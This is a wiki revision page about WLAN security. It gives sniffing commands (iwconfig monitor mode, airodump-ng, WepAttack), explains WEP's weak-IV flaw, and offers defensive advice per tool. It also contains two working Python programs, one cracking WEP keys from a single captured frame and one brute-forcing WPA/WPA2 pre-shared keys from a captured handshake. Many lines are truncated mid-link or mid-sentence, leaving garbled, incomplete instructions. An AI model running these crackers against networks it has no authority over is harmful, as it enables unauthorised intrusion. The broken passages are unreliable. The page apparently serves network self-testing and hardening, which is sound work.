security:wlan-security, revision 2007/04/17 19:08 (st) compared with revision 2007/09/12 16:27 (current, st)
====== WLAN Security ======
FIXME This document is partly out of date; a newer and optimized attack exists.
prismstumbler\\
aircrack\\
NetStumbler\\
[[http://
ASLeap\\
Ethereal (new name: Wireshark)

  * **[[WEP-Cracking]]**

===== Tools =====

==== Preparation ====
First you have to put the WLAN card into so-called monitor mode. The card then no longer discards every frame that is not addressed to it, but passes every frame it receives up to the host, so that all traffic on the channel can be recorded. Then tune the card to the channel of the network you want to observe (on many older drivers the interface has to be down before the mode can be changed):

  iwconfig wlan0 mode monitor
  iwconfig wlan0 channel 1

==== Kismet ====
[[http://

Kismet scans for available networks and gives you some interesting information
about them.

  #> apt-get -t testing install kismet

You have to adapt the ''/
  zcat /
displays the help. In section 12: "

So, for example:
  source=prism2_hostap,
where the driver comes first, then the interface. The driver name has to match the one the card really uses, otherwise Kismet cannot put the card into monitor mode.

FIXME
You need to be root to run Kismet. When started it gathers information about the
available networks in an "
interesting network (e.g. your own), press ''
choice, then select the network and press ''

Make sure your network has WEP encryption enabled. It is possible to hide the
name of your network (SSID hiding); however, Kismet will detect it nonetheless and
will show it as "

Kismet logs received packets to ''/
later.

+ | |||
==== Airodump ====
Also a WLAN sniffer.
[[http://

==== Sniffing ====
  airodump-ng --channel 1 --abg --write dumpfile --ivs ath0
''--ivs'' can be given if you only want to crack the WEP key: the dump then holds only the IVs and the small part of each frame that aircrack needs, not whole frames, so it is useless for anything that needs a complete packet (Wireshark, or a dictionary attack against a single frame).

<box>
You need roughly 50,000 to 200,000 IVs for 64-bit WEP
and 200,000 to 700,000 IVs for a 128-bit key.
These figures are for the older statistical (FMS/KoreK) attacks; the newer attack mentioned in the FIXME at the top needs far fewer frames.
</box>
==== AirSnort ====

The next tool to use is AirSnort. This is a GTK-based network sniffer similar to
Kismet but able to break WEP encryption. Install it and run it as root.

  #> apt-get -t testing install airsnort

Some theory first. WEP uses the RC4 stream cipher, and the way it uses it is not safe:
the 24-bit IV is sent in clear and simply prepended to the secret key to form the per-frame RC4 key.
In fact it has some known security flaws which are described [[http://
Put simply, a few thousand of the possible IVs are "weak": with such an IV the first
keystream byte (which an attacker knows, because every data frame begins with the fixed
SNAP header byte 0xAA) leaks one byte of the secret key with a noticeable probability, and
collecting enough weak-IV frames recovers the key byte by byte. A few years ago you just
had to run a tool like AirSnort to crack WEP encryption in a few minutes by fetching these
weak-IV packets from the air.

Well, nowadays all manufacturers have changed their WEP implementations to avoid
these weak IVs, so AirSnort will need a large amount of packets to get the WEP key. If you
get a lot of "
hardware in your network which needs to be updated.

+ | |||
==== WepAttack ====

Even if the manufacturers no longer produce the weak IVs, there is room
for a simpler attack: guessing the WEP key from a wordlist. The
interesting thing is that this can be done completely undetected. All that is
needed is a single passively sniffed data packet: each candidate key is used to decrypt
that one packet offline, and the key is right when the packet's CRC-32 integrity check
value (ICV) verifies.

Let's install the tool first. Get it from http://
unpack it. For compiling you need some libraries, too.

  #> apt-get -t testing install libssl-dev libpcap-dev
  $> tar -xzvf WepAttack-0.1.3.tar.gz
  $> cd WepAttack-0.1.3/
  $> make
  #> cp wepattack /

To run the dictionary attack against a WEP-encrypted packet you need a wordlist (available
from the above site) and a packet dump from Kismet. Then just run the following
command.

  $> wepattack -f /

If this finds your key, it is too weak.
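Added example, not from the original page nor from the AirSnort or WepAttack authors: a minimal Python model of how WEP uses RC4, covering both the AirSnort passage above (which IVs count as "interesting") and the single-packet dictionary attack WepAttack performs. The 40-bit ASCII key mapping, the IV-prepended-to-key construction and the little-endian CRC-32 ICV are how WEP really works; the key, the wordlist and the frame contents are constructed for the demo, and the frame is a simplified WEP body (IV plus encrypted payload) without the 802.11 header.

```python
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Simplified WEP body: IV (3 bytes, sent in clear) || RC4(IV || key, payload || ICV),
    where the ICV is the little-endian CRC-32 of the payload. No 802.11 header."""
    assert len(iv) == 3 and len(key) in (5, 13), "40- or 104-bit key"
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + rc4(iv + key, payload + icv)


def wep_decrypt(key: bytes, body: bytes):
    """Return the payload if the ICV verifies under this key, else None."""
    iv, ct = body[:3], body[3:]
    pt = rc4(iv + key, ct)
    payload, icv = pt[:-4], pt[-4:]
    return payload if zlib.crc32(payload).to_bytes(4, "little") == icv else None


def is_fms_weak_iv(iv: bytes, key_len: int = 5) -> bool:
    """The FMS 'resolved' IVs of the form (A+3, 0xFF, X) that leak secret key byte A.
    These are the frames AirSnort counts as interesting and the ones patched
    firmware refuses to generate."""
    return iv[1] == 0xFF and 3 <= iv[0] < 3 + key_len


def first_keystream_byte(body: bytes) -> int:
    """Why the attacker knows keystream byte 0: every WEP data frame starts with
    the LLC/SNAP header, whose first byte is always 0xAA."""
    return body[3] ^ 0xAA


def dictionary_attack(body: bytes, wordlist):
    """WepAttack-style: try every wordlist entry as an ASCII WEP key against ONE
    sniffed frame; a valid ICV identifies the right key (false-positive rate 2^-32)."""
    for word in wordlist:
        key = word.encode()
        if len(key) in (5, 13) and wep_decrypt(key, body) is not None:
            return word
    return None


# Constructed sample: a 40-bit key taken from a wordlist, one frame with a weak IV.
KEY = b"hello"
IV = bytes([0x05, 0xFF, 0x42])
FRAME = wep_encrypt(KEY, IV, b"\xaa\xaa\x03" + b"ping")  # SNAP header + data
WORDLIST = ["admin", "12345", "hello", "secret-long-key"]

if __name__ == "__main__":
    print("weak IV:", is_fms_weak_iv(IV))
    print("recovered key:", dictionary_attack(FRAME, WORDLIST))
```

Run it as a script to see the recovered key. Because the ICV check misfires only once in 2^32 wrong keys, one frame is enough to confirm a guess, which is why the attack needs nothing beyond a single passively captured packet and never transmits anything.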
+ | |||
===== Summary =====
If your WLAN passes all these tests it should be reasonably safe from most
crackers; note, however, the FIXME at the top: newer attacks break WEP regardless of the key chosen, so the lasting fix is WPA2 (see below). At our company all traffic to the internal LAN is additionally
encrypted by [[netzwerke:
+ | |||
===== Protecting Against These Tools =====
[[http://

Just as it is important to know how to use the aforementioned tools, it is important to know the best practices for securing your wireless network against them.

NetStumbler – Do not broadcast your SSID (NetStumbler scans actively and relies on the AP answering its probe requests). Ensure your WLAN is protected by using strong authentication and encryption.

Kismet – There is really nothing you can do to stop Kismet from finding your WLAN, since it listens passively to every frame, so ensure your WLAN is protected by using strong authentication and encryption.

Airsnort – Use a 128-bit, not a 40-bit, WEP key. This takes longer to crack but does not make WEP secure. If your equipment supports it, use WPA or WPA2 instead of WEP (may require a firmware or software update).

Cowpatty – Use a long and complex WPA pre-shared key. Once an attacker has captured a single four-way handshake the key can be guessed offline, so the PSK must not be in any dictionary; a long random key simply cannot be enumerated. In a corporate scenario do not use WPA with a pre-shared key; use a good EAP type to protect the authentication and limit the number of incorrect guesses before the account is locked out. If using certificate-like functionality,

ASLeap – Use long and complex credentials,

Ethereal – Use encryption, so that anything sniffed is difficult or practically impossible to decrypt. WPA2, which uses AES (CCMP), is not realistically breakable by attacking the cipher; its weak point is a guessable pre-shared key, see above. Even WEP will encrypt the data, though as shown above it can be broken. When in a public wireless hotspot (which generally does not offer encryption),
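Added example, not part of the original page nor of Cowpatty itself: the offline WPA/WPA2-PSK handshake check behind the Cowpatty advice above, in Python. The PMK derivation (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt), the PRF-512 PTK expansion and the HMAC-SHA1-128 EAPOL-Key MIC are what IEEE 802.11i specifies for WPA2 with CCMP; the SSID, passphrases, MAC addresses, nonces and EAPOL-Key body are constructed stand-ins for a captured handshake.

```python
import hashlib
import hmac
import random
from typing import Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    These 4096 rounds are essentially the whole cost of one offline guess."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes = 80 bytes, of which the first 64 are used
        msg = b"Pairwise key expansion\x00" + data + bytes([i])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 keyed with the KCK (first 16 bytes of the PTK)
    over the EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(ptk[:16], eapol_frame, hashlib.sha1).digest()[:16]


def make_handshake(passphrase: str, ssid: str, seed: int = 7) -> dict:
    """Constructed stand-in for a captured four-way handshake (message 2):
    deterministic pseudo-random MACs and nonces, a placeholder EAPOL-Key body
    with the MIC field already zeroed, and the MIC the real client would send."""
    rng = random.Random(seed)

    def rand(n: int) -> bytes:
        return bytes(rng.randrange(256) for _ in range(n))

    hs = {"ssid": ssid, "aa": rand(6), "spa": rand(6),
          "anonce": rand(32), "snonce": rand(32),
          "eapol": b"\x01\x03\x00\x75\x02\x01\x0a\x00" + rand(64) + bytes(16) + rand(31)}
    ptk = derive_ptk(derive_pmk(passphrase, ssid), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk, hs["eapol"])
    return hs


def crack_psk(hs: dict, wordlist) -> Optional[str]:
    """Cowpatty-style offline attack: one PBKDF2 + PRF + HMAC per candidate,
    with no interaction with the network at all."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue
        ptk = derive_ptk(derive_pmk(word, hs["ssid"]), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk, hs["eapol"]), hs["mic"]):
            return word
    return None


# Constructed inputs: a dictionary passphrase falls, a long random one does not.
SSID = "HomeNet"
WORDLIST = ["password", "letmein1", "qwertyuiop"]
WEAK = make_handshake("letmein1", SSID)
STRONG = make_handshake("kX7#pQ2v!mR9zL4w@Fb1", SSID)

if __name__ == "__main__":
    print("weak PSK recovered:", crack_psk(WEAK, WORDLIST))
    print("strong PSK recovered:", crack_psk(STRONG, WORDLIST))
```

The PBKDF2 step is where the attacker's time goes: a few thousand candidates per second per CPU core is typical, so a wordlist passphrase is found in seconds while a long random one is out of reach. ''derive_pmk'' can be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE") if you want to confirm the derivation against the standard.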